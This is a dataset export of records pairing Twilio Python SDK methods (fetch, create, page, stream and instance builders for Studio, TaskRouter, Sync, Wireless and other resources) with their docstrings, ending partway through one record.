_id
stringlengths
2
7
title
stringlengths
1
88
partition
stringclasses
3 values
text
stringlengths
75
19.8k
language
stringclasses
1 value
meta_information
dict
q29600
StepContextPage.get_instance
train
def get_instance(self, payload): """ Build an instance of StepContextInstance :param dict payload: Payload response from the API :returns: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance :rtype: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance """ return StepContextInstance( self._version, payload, flow_sid=self._solution['flow_sid'], engagement_sid=self._solution['engagement_sid'], step_sid=self._solution['step_sid'], )
python
{ "resource": "" }
q29601
StepContextContext.fetch
train
def fetch(self): """ Fetch a StepContextInstance :returns: Fetched StepContextInstance :rtype: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return StepContextInstance( self._version, payload, flow_sid=self._solution['flow_sid'], engagement_sid=self._solution['engagement_sid'], step_sid=self._solution['step_sid'], )
python
{ "resource": "" }
q29602
format_language
train
def format_language(language): """ Attempt to format language parameter as 'ww-WW'. :param string language: language parameter """ if not language: return language if not re.match('^[a-zA-Z]{2}[_-][a-zA-Z]{2}$', language): raise TwiMLException('Invalid value for language parameter.') return language[0:2].lower() + '-' + language[3:5].upper()
python
{ "resource": "" }
q29603
TwiML.to_xml
train
def to_xml(self, xml_declaration=True): """ Return the contents of this verb as an XML string :param bool xml_declaration: Include the XML declaration. Defaults to True """ xml = ET.tostring(self.xml()).decode('utf-8') return '<?xml version="1.0" encoding="UTF-8"?>{}'.format(xml) if xml_declaration else xml
python
{ "resource": "" }
q29604
TodayPage.get_instance
train
def get_instance(self, payload): """ Build an instance of TodayInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.usage.record.today.TodayInstance :rtype: twilio.rest.api.v2010.account.usage.record.today.TodayInstance """ return TodayInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29605
AssistantFallbackActionsPage.get_instance
train
def get_instance(self, payload): """ Build an instance of AssistantFallbackActionsInstance :param dict payload: Payload response from the API :returns: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsInstance :rtype: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsInstance """ return AssistantFallbackActionsInstance( self._version, payload, assistant_sid=self._solution['assistant_sid'], )
python
{ "resource": "" }
q29606
NewSigningKeyPage.get_instance
train
def get_instance(self, payload): """ Build an instance of NewSigningKeyInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.new_signing_key.NewSigningKeyInstance :rtype: twilio.rest.api.v2010.account.new_signing_key.NewSigningKeyInstance """ return NewSigningKeyInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29607
ConnectAppList.get
train
def get(self, sid): """ Constructs a ConnectAppContext :param sid: The unique string that identifies the resource :returns: twilio.rest.api.v2010.account.connect_app.ConnectAppContext :rtype: twilio.rest.api.v2010.account.connect_app.ConnectAppContext """ return ConnectAppContext(self._version, account_sid=self._solution['account_sid'], sid=sid, )
python
{ "resource": "" }
q29608
ConnectAppPage.get_instance
train
def get_instance(self, payload): """ Build an instance of ConnectAppInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.connect_app.ConnectAppInstance :rtype: twilio.rest.api.v2010.account.connect_app.ConnectAppInstance """ return ConnectAppInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29609
FieldValueList.create
train
def create(self, language, value, synonym_of=values.unset): """ Create a new FieldValueInstance :param unicode language: The ISO language-country tag that identifies the language of the value :param unicode value: The Field Value data :param unicode synonym_of: The string value that indicates which word the field value is a synonym of :returns: Newly created FieldValueInstance :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance """ data = values.of({'Language': language, 'Value': value, 'SynonymOf': synonym_of, }) payload = self._version.create( 'POST', self._uri, data=data, ) return FieldValueInstance( self._version, payload, assistant_sid=self._solution['assistant_sid'], field_type_sid=self._solution['field_type_sid'], )
python
{ "resource": "" }
q29610
FieldValueList.get
train
def get(self, sid): """ Constructs a FieldValueContext :param sid: The unique string that identifies the resource :returns: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueContext :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueContext """ return FieldValueContext( self._version, assistant_sid=self._solution['assistant_sid'], field_type_sid=self._solution['field_type_sid'], sid=sid, )
python
{ "resource": "" }
q29611
FieldValuePage.get_instance
train
def get_instance(self, payload): """ Build an instance of FieldValueInstance :param dict payload: Payload response from the API :returns: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance """ return FieldValueInstance( self._version, payload, assistant_sid=self._solution['assistant_sid'], field_type_sid=self._solution['field_type_sid'], )
python
{ "resource": "" }
q29612
FieldValueContext.fetch
train
def fetch(self): """ Fetch a FieldValueInstance :returns: Fetched FieldValueInstance :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return FieldValueInstance( self._version, payload, assistant_sid=self._solution['assistant_sid'], field_type_sid=self._solution['field_type_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29613
RatePlanList.create
train
def create(self, unique_name=values.unset, friendly_name=values.unset, data_enabled=values.unset, data_limit=values.unset, data_metering=values.unset, messaging_enabled=values.unset, voice_enabled=values.unset, national_roaming_enabled=values.unset, international_roaming=values.unset, national_roaming_data_limit=values.unset, international_roaming_data_limit=values.unset): """ Create a new RatePlanInstance :param unicode unique_name: A user-provided string that uniquely identifies this resource as an alternative to the Sid. :param unicode friendly_name: A user-provided string that identifies this resource. :param bool data_enabled: Defines whether SIMs are capable of using GPRS/3G/LTE data connectivity. :param unicode data_limit: Network-enforced limit specifying the total Megabytes of data usage allowed during one month on the home network. :param unicode data_metering: The model by which to meter data usage, in accordance with the two available data metering models. :param bool messaging_enabled: Defines whether SIMs are capable of making and sending and receiving SMS messages via either Commands or Programmable SMS APIs. :param bool voice_enabled: Defines whether SIMs are capable of making and receiving voice calls. :param bool national_roaming_enabled: Defines whether SIMs can roam onto other networks in the SIM's home country. :param unicode international_roaming: The international_roaming :param unicode national_roaming_data_limit: Network-enforced limit specifying the total Megabytes of national roaming data usage allowed during one month. :param unicode international_roaming_data_limit: The international_roaming_data_limit :returns: Newly created RatePlanInstance :rtype: twilio.rest.wireless.v1.rate_plan.RatePlanInstance """ data = values.of({ 'UniqueName': unique_name, 'FriendlyName': friendly_name, 'DataEnabled': data_enabled, 'DataLimit': data_limit, 'DataMetering': data_metering, 'MessagingEnabled': messaging_enabled, 'VoiceEnabled': voice_enabled, 'NationalRoamingEnabled': national_roaming_enabled, 'InternationalRoaming': serialize.map(international_roaming, lambda e: e), 'NationalRoamingDataLimit': national_roaming_data_limit, 'InternationalRoamingDataLimit': international_roaming_data_limit, }) payload = self._version.create( 'POST', self._uri, data=data, ) return RatePlanInstance(self._version, payload, )
python
{ "resource": "" }
q29614
ReservationContext.fetch
train
def fetch(self): """ Fetch a ReservationInstance :returns: Fetched ReservationInstance :rtype: twilio.rest.taskrouter.v1.workspace.task.reservation.ReservationInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return ReservationInstance( self._version, payload, workspace_sid=self._solution['workspace_sid'], task_sid=self._solution['task_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29615
AlertList.page
train
def page(self, log_level=values.unset, start_date=values.unset, end_date=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of AlertInstance records from the API. Request is executed immediately :param unicode log_level: Only show alerts for this log-level. :param date start_date: Only show Alerts on or after this date. :param date end_date: Only show Alerts on or before this date. :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of AlertInstance :rtype: twilio.rest.monitor.v1.alert.AlertPage """ params = values.of({ 'LogLevel': log_level, 'StartDate': serialize.iso8601_date(start_date), 'EndDate': serialize.iso8601_date(end_date), 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return AlertPage(self._version, response, self._solution)
python
{ "resource": "" }
q29616
PublicKeyList.create
train
def create(self, public_key, friendly_name=values.unset, account_sid=values.unset): """ Create a new PublicKeyInstance :param unicode public_key: A URL encoded representation of the public key :param unicode friendly_name: A string to describe the resource :param unicode account_sid: The Subaccount this Credential should be associated with. :returns: Newly created PublicKeyInstance :rtype: twilio.rest.accounts.v1.credential.public_key.PublicKeyInstance """ data = values.of({ 'PublicKey': public_key, 'FriendlyName': friendly_name, 'AccountSid': account_sid, }) payload = self._version.create( 'POST', self._uri, data=data, ) return PublicKeyInstance(self._version, payload, )
python
{ "resource": "" }
q29617
TollFreePage.get_instance
train
def get_instance(self, payload): """ Build an instance of TollFreeInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.available_phone_number.toll_free.TollFreeInstance :rtype: twilio.rest.api.v2010.account.available_phone_number.toll_free.TollFreeInstance """ return TollFreeInstance( self._version, payload, account_sid=self._solution['account_sid'], country_code=self._solution['country_code'], )
python
{ "resource": "" }
q29618
TaskList.stream
train
def stream(self, priority=values.unset, assignment_status=values.unset, workflow_sid=values.unset, workflow_name=values.unset, task_queue_sid=values.unset, task_queue_name=values.unset, evaluate_task_attributes=values.unset, ordering=values.unset, has_addons=values.unset, limit=None, page_size=None): """ Streams TaskInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param unicode priority: Retrieve the list of all Tasks in the workspace with the specified priority. :param unicode assignment_status: Returns the list of all Tasks in the workspace with the specified AssignmentStatus. :param unicode workflow_sid: Returns the list of Tasks that are being controlled by the Workflow with the specified Sid value. :param unicode workflow_name: Returns the list of Tasks that are being controlled by the Workflow with the specified FriendlyName value. :param unicode task_queue_sid: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the Sid specified. :param unicode task_queue_name: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the FriendlyName specified. :param unicode evaluate_task_attributes: Provide a task attributes expression, and this will return tasks which match the attributes. :param unicode ordering: Use this parameter to control the order of the Tasks returned. :param bool has_addons: The has_addons :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.taskrouter.v1.workspace.task.TaskInstance] """ limits = self._version.read_limits(limit, page_size) page = self.page( priority=priority, assignment_status=assignment_status, workflow_sid=workflow_sid, workflow_name=workflow_name, task_queue_sid=task_queue_sid, task_queue_name=task_queue_name, evaluate_task_attributes=evaluate_task_attributes, ordering=ordering, has_addons=has_addons, page_size=limits['page_size'], ) return self._version.stream(page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29619
TaskList.page
train
def page(self, priority=values.unset, assignment_status=values.unset, workflow_sid=values.unset, workflow_name=values.unset, task_queue_sid=values.unset, task_queue_name=values.unset, evaluate_task_attributes=values.unset, ordering=values.unset, has_addons=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of TaskInstance records from the API. Request is executed immediately :param unicode priority: Retrieve the list of all Tasks in the workspace with the specified priority. :param unicode assignment_status: Returns the list of all Tasks in the workspace with the specified AssignmentStatus. :param unicode workflow_sid: Returns the list of Tasks that are being controlled by the Workflow with the specified Sid value. :param unicode workflow_name: Returns the list of Tasks that are being controlled by the Workflow with the specified FriendlyName value. :param unicode task_queue_sid: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the Sid specified. :param unicode task_queue_name: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the FriendlyName specified. :param unicode evaluate_task_attributes: Provide a task attributes expression, and this will return tasks which match the attributes. :param unicode ordering: Use this parameter to control the order of the Tasks returned. :param bool has_addons: The has_addons :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of TaskInstance :rtype: twilio.rest.taskrouter.v1.workspace.task.TaskPage """ params = values.of({ 'Priority': priority, 'AssignmentStatus': serialize.map(assignment_status, lambda e: e), 'WorkflowSid': workflow_sid, 'WorkflowName': workflow_name, 'TaskQueueSid': task_queue_sid, 'TaskQueueName': task_queue_name, 'EvaluateTaskAttributes': evaluate_task_attributes, 'Ordering': ordering, 'HasAddons': has_addons, 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return TaskPage(self._version, response, self._solution)
python
{ "resource": "" }
q29620
StreamMessageList.create
train
def create(self, data): """ Create a new StreamMessageInstance :param dict data: Stream Message body. :returns: Newly created StreamMessageInstance :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance """ data = values.of({'Data': serialize.object(data), }) payload = self._version.create( 'POST', self._uri, data=data, ) return StreamMessageInstance( self._version, payload, service_sid=self._solution['service_sid'], stream_sid=self._solution['stream_sid'], )
python
{ "resource": "" }
q29621
StreamMessagePage.get_instance
train
def get_instance(self, payload): """ Build an instance of StreamMessageInstance :param dict payload: Payload response from the API :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance """ return StreamMessageInstance( self._version, payload, service_sid=self._solution['service_sid'], stream_sid=self._solution['stream_sid'], )
python
{ "resource": "" }
q29622
EnvironmentList.create
train
def create(self, unique_name, domain_suffix=values.unset): """ Create a new EnvironmentInstance :param unicode unique_name: The unique_name :param unicode domain_suffix: The domain_suffix :returns: Newly created EnvironmentInstance :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentInstance """ data = values.of({'UniqueName': unique_name, 'DomainSuffix': domain_suffix, }) payload = self._version.create( 'POST', self._uri, data=data, ) return EnvironmentInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29623
EnvironmentList.get
train
def get(self, sid): """ Constructs a EnvironmentContext :param sid: The sid :returns: twilio.rest.serverless.v1.service.environment.EnvironmentContext :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentContext """ return EnvironmentContext(self._version, service_sid=self._solution['service_sid'], sid=sid, )
python
{ "resource": "" }
q29624
EnvironmentPage.get_instance
train
def get_instance(self, payload): """ Build an instance of EnvironmentInstance :param dict payload: Payload response from the API :returns: twilio.rest.serverless.v1.service.environment.EnvironmentInstance :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentInstance """ return EnvironmentInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29625
EnvironmentContext.variables
train
def variables(self): """ Access the variables :returns: twilio.rest.serverless.v1.service.environment.variable.VariableList :rtype: twilio.rest.serverless.v1.service.environment.variable.VariableList """ if self._variables is None: self._variables = VariableList( self._version, service_sid=self._solution['service_sid'], environment_sid=self._solution['sid'], ) return self._variables
python
{ "resource": "" }
q29626
ExecutionList.stream
train
def stream(self, date_created_from=values.unset, date_created_to=values.unset, limit=None, page_size=None): """ Streams ExecutionInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param datetime date_created_from: Only show Executions that started on or after this ISO8601 date-time. :param datetime date_created_to: Only show Executions that started before this this ISO8601 date-time. :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.studio.v1.flow.execution.ExecutionInstance] """ limits = self._version.read_limits(limit, page_size) page = self.page( date_created_from=date_created_from, date_created_to=date_created_to, page_size=limits['page_size'], ) return self._version.stream(page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29627
ExecutionList.page
train
def page(self, date_created_from=values.unset, date_created_to=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of ExecutionInstance records from the API. Request is executed immediately :param datetime date_created_from: Only show Executions that started on or after this ISO8601 date-time. :param datetime date_created_to: Only show Executions that started before this this ISO8601 date-time. :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of ExecutionInstance :rtype: twilio.rest.studio.v1.flow.execution.ExecutionPage """ params = values.of({ 'DateCreatedFrom': serialize.iso8601_datetime(date_created_from), 'DateCreatedTo': serialize.iso8601_datetime(date_created_to), 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return ExecutionPage(self._version, response, self._solution)
python
{ "resource": "" }
q29628
ExecutionList.create
train
def create(self, to, from_, parameters=values.unset): """ Create a new ExecutionInstance :param unicode to: The Contact phone number to start a Studio Flow Execution. :param unicode from_: The Twilio phone number to send messages or initiate calls from during the Flow Execution. :param dict parameters: JSON data that will be added to your flow's context and can accessed as variables inside your flow. :returns: Newly created ExecutionInstance :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance """ data = values.of({'To': to, 'From': from_, 'Parameters': serialize.object(parameters), }) payload = self._version.create( 'POST', self._uri, data=data, ) return ExecutionInstance(self._version, payload, flow_sid=self._solution['flow_sid'], )
python
{ "resource": "" }
q29629
ExecutionList.get
train
def get(self, sid): """ Constructs a ExecutionContext :param sid: Execution Sid. :returns: twilio.rest.studio.v1.flow.execution.ExecutionContext :rtype: twilio.rest.studio.v1.flow.execution.ExecutionContext """ return ExecutionContext(self._version, flow_sid=self._solution['flow_sid'], sid=sid, )
python
{ "resource": "" }
q29630
ExecutionPage.get_instance
train
def get_instance(self, payload): """ Build an instance of ExecutionInstance :param dict payload: Payload response from the API :returns: twilio.rest.studio.v1.flow.execution.ExecutionInstance :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance """ return ExecutionInstance(self._version, payload, flow_sid=self._solution['flow_sid'], )
python
{ "resource": "" }
q29631
ExecutionContext.fetch
train
def fetch(self): """ Fetch a ExecutionInstance :returns: Fetched ExecutionInstance :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return ExecutionInstance( self._version, payload, flow_sid=self._solution['flow_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29632
ExecutionContext.execution_context
train
def execution_context(self): """ Access the execution_context :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextList :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextList """ if self._execution_context is None: self._execution_context = ExecutionContextList( self._version, flow_sid=self._solution['flow_sid'], execution_sid=self._solution['sid'], ) return self._execution_context
python
{ "resource": "" }
q29633
ExecutionContextList.get
train
def get(self): """ Constructs a ExecutionContextContext :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextContext :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextContext """ return ExecutionContextContext( self._version, flow_sid=self._solution['flow_sid'], execution_sid=self._solution['execution_sid'], )
python
{ "resource": "" }
q29634
ExecutionContextPage.get_instance
train
def get_instance(self, payload): """ Build an instance of ExecutionContextInstance :param dict payload: Payload response from the API :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance """ return ExecutionContextInstance( self._version, payload, flow_sid=self._solution['flow_sid'], execution_sid=self._solution['execution_sid'], )
python
{ "resource": "" }
q29635
ExecutionContextContext.fetch
train
def fetch(self): """ Fetch a ExecutionContextInstance :returns: Fetched ExecutionContextInstance :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return ExecutionContextInstance( self._version, payload, flow_sid=self._solution['flow_sid'], execution_sid=self._solution['execution_sid'], )
python
{ "resource": "" }
q29636
WebhookList.create
train
def create(self, target, configuration_url=values.unset, configuration_method=values.unset, configuration_filters=values.unset, configuration_triggers=values.unset, configuration_flow_sid=values.unset, configuration_retry_count=values.unset, configuration_replay_after=values.unset, configuration_buffer_messages=values.unset, configuration_buffer_window=values.unset): """ Create a new WebhookInstance :param WebhookInstance.Target target: The target of this webhook. :param unicode configuration_url: The absolute url the webhook request should be sent to. :param WebhookInstance.Method configuration_method: The HTTP method to be used when sending a webhook request. :param unicode configuration_filters: The list of events, firing webhook event for this Session. :param unicode configuration_triggers: The list of keywords, firing webhook event for this Session. :param unicode configuration_flow_sid: The studio flow sid, where the webhook should be sent to. :param unicode configuration_retry_count: The number of retries in case of webhook request failures. :param unicode configuration_replay_after: The message index for which and it's successors the webhook will be replayed. :param bool configuration_buffer_messages: The flag whether buffering should be applied to messages. :param unicode configuration_buffer_window: The period of buffering messages. :returns: Newly created WebhookInstance :rtype: twilio.rest.messaging.v1.session.webhook.WebhookInstance """ data = values.of({ 'Target': target, 'Configuration.Url': configuration_url, 'Configuration.Method': configuration_method, 'Configuration.Filters': serialize.map(configuration_filters, lambda e: e), 'Configuration.Triggers': serialize.map(configuration_triggers, lambda e: e), 'Configuration.FlowSid': configuration_flow_sid, 'Configuration.RetryCount': configuration_retry_count, 'Configuration.ReplayAfter': configuration_replay_after, 'Configuration.BufferMessages': configuration_buffer_messages, 'Configuration.BufferWindow': configuration_buffer_window, }) payload = self._version.create( 'POST', self._uri, data=data, ) return WebhookInstance(self._version, payload, session_sid=self._solution['session_sid'], )
python
{ "resource": "" }
q29637
SharedCostList.page
train
def page(self, area_code=values.unset, contains=values.unset, sms_enabled=values.unset, mms_enabled=values.unset, voice_enabled=values.unset, exclude_all_address_required=values.unset, exclude_local_address_required=values.unset, exclude_foreign_address_required=values.unset, beta=values.unset, near_number=values.unset, near_lat_long=values.unset, distance=values.unset, in_postal_code=values.unset, in_region=values.unset, in_rate_center=values.unset, in_lata=values.unset, in_locality=values.unset, fax_enabled=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of SharedCostInstance records from the API. Request is executed immediately :param unicode area_code: The area code of the phone numbers to read :param unicode contains: The pattern on which to match phone numbers :param bool sms_enabled: Whether the phone numbers can receive text messages :param bool mms_enabled: Whether the phone numbers can receive MMS messages :param bool voice_enabled: Whether the phone numbers can receive calls. :param bool exclude_all_address_required: Whether to exclude phone numbers that require an Address :param bool exclude_local_address_required: Whether to exclude phone numbers that require a local address :param bool exclude_foreign_address_required: Whether to exclude phone numbers that require a foreign address :param bool beta: Whether to read phone numbers new to the Twilio platform :param unicode near_number: Given a phone number, find a geographically close number within distance miles. (US/Canada only) :param unicode near_lat_long: Given a latitude/longitude pair lat,long find geographically close numbers within distance miles. (US/Canada only) :param unicode distance: The search radius, in miles, for a near_ query. (US/Canada only) :param unicode in_postal_code: Limit results to a particular postal code. (US/Canada only) :param unicode in_region: Limit results to a particular region. (US/Canada only) :param unicode in_rate_center: Limit results to a specific rate center, or given a phone number search within the same rate center as that number. (US/Canada only) :param unicode in_lata: Limit results to a specific local access and transport area. (US/Canada only) :param unicode in_locality: Limit results to a particular locality :param bool fax_enabled: Whether the phone numbers can receive faxes :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of SharedCostInstance :rtype: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostPage """ params = values.of({ 'AreaCode': area_code, 'Contains': contains, 'SmsEnabled': sms_enabled, 'MmsEnabled': mms_enabled, 'VoiceEnabled': voice_enabled, 'ExcludeAllAddressRequired': exclude_all_address_required, 'ExcludeLocalAddressRequired': exclude_local_address_required, 'ExcludeForeignAddressRequired': exclude_foreign_address_required, 'Beta': beta, 'NearNumber': near_number, 'NearLatLong': near_lat_long, 'Distance': distance, 'InPostalCode': in_postal_code, 'InRegion': in_region, 'InRateCenter': in_rate_center, 'InLata': in_lata, 'InLocality': in_locality, 'FaxEnabled': fax_enabled, 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return SharedCostPage(self._version, response, self._solution)
python
{ "resource": "" }
q29638
SharedCostPage.get_instance
train
def get_instance(self, payload): """ Build an instance of SharedCostInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostInstance :rtype: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostInstance """ return SharedCostInstance( self._version, payload, account_sid=self._solution['account_sid'], country_code=self._solution['country_code'], )
python
{ "resource": "" }
q29639
IpAccessControlListContext.ip_addresses
train
def ip_addresses(self): """ Access the ip_addresses :returns: twilio.rest.api.v2010.account.sip.ip_access_control_list.ip_address.IpAddressList :rtype: twilio.rest.api.v2010.account.sip.ip_access_control_list.ip_address.IpAddressList """ if self._ip_addresses is None: self._ip_addresses = IpAddressList( self._version, account_sid=self._solution['account_sid'], ip_access_control_list_sid=self._solution['sid'], ) return self._ip_addresses
python
{ "resource": "" }
q29640
AssistantContext.assistant_fallback_actions
train
def assistant_fallback_actions(self): """ Access the assistant_fallback_actions :returns: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsList :rtype: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsList """ if self._assistant_fallback_actions is None: self._assistant_fallback_actions = AssistantFallbackActionsList( self._version, assistant_sid=self._solution['sid'], ) return self._assistant_fallback_actions
python
{ "resource": "" }
q29641
AssistantContext.assistant_initiation_actions
train
def assistant_initiation_actions(self): """ Access the assistant_initiation_actions :returns: twilio.rest.preview.understand.assistant.assistant_initiation_actions.AssistantInitiationActionsList :rtype: twilio.rest.preview.understand.assistant.assistant_initiation_actions.AssistantInitiationActionsList """ if self._assistant_initiation_actions is None: self._assistant_initiation_actions = AssistantInitiationActionsList( self._version, assistant_sid=self._solution['sid'], ) return self._assistant_initiation_actions
python
{ "resource": "" }
q29642
AllTimePage.get_instance
train
def get_instance(self, payload): """ Build an instance of AllTimeInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.usage.record.all_time.AllTimeInstance :rtype: twilio.rest.api.v2010.account.usage.record.all_time.AllTimeInstance """ return AllTimeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29643
NotificationList.create
train
def create(self, body=values.unset, priority=values.unset, ttl=values.unset, title=values.unset, sound=values.unset, action=values.unset, data=values.unset, apn=values.unset, gcm=values.unset, sms=values.unset, facebook_messenger=values.unset, fcm=values.unset, segment=values.unset, alexa=values.unset, to_binding=values.unset, identity=values.unset, tag=values.unset): """ Create a new NotificationInstance :param unicode body: The notification body text :param NotificationInstance.Priority priority: The priority of the notification :param unicode ttl: How long, in seconds, the notification is valid :param unicode title: The notification title :param unicode sound: The name of the sound to be played for the notification :param unicode action: The actions to display for the notification :param dict data: The custom key-value pairs of the notification's payload :param dict apn: The APNS-specific payload that overrides corresponding attributes in a generic payload for APNS Bindings :param dict gcm: The GCM-specific payload that overrides corresponding attributes in generic payload for GCM Bindings :param dict sms: The SMS-specific payload that overrides corresponding attributes in generic payload for SMS Bindings :param dict facebook_messenger: Deprecated :param dict fcm: The FCM-specific payload that overrides corresponding attributes in generic payload for FCM Bindings :param unicode segment: A Segment to notify :param dict alexa: Deprecated :param unicode to_binding: The destination address specified as a JSON string :param unicode identity: The `identity` value that identifies the new resource's User :param unicode tag: A tag that selects the Bindings to notify :returns: Newly created NotificationInstance :rtype: twilio.rest.notify.v1.service.notification.NotificationInstance """ data = values.of({ 'Identity': serialize.map(identity, lambda e: e), 'Tag': serialize.map(tag, lambda e: e), 'Body': body, 'Priority': priority, 'Ttl': ttl, 'Title': title, 'Sound': sound, 'Action': action, 'Data': serialize.object(data), 'Apn': serialize.object(apn), 'Gcm': serialize.object(gcm), 'Sms': serialize.object(sms), 'FacebookMessenger': serialize.object(facebook_messenger), 'Fcm': serialize.object(fcm), 'Segment': serialize.map(segment, lambda e: e), 'Alexa': serialize.object(alexa), 'ToBinding': serialize.map(to_binding, lambda e: e), }) payload = self._version.create( 'POST', self._uri, data=data, ) return NotificationInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29644
DataSessionList.stream
train
def stream(self, end=values.unset, start=values.unset, limit=None, page_size=None): """ Streams DataSessionInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param datetime end: The end :param datetime start: The start :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.wireless.v1.sim.data_session.DataSessionInstance] """ limits = self._version.read_limits(limit, page_size) page = self.page(end=end, start=start, page_size=limits['page_size'], ) return self._version.stream(page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29645
DataSessionList.page
train
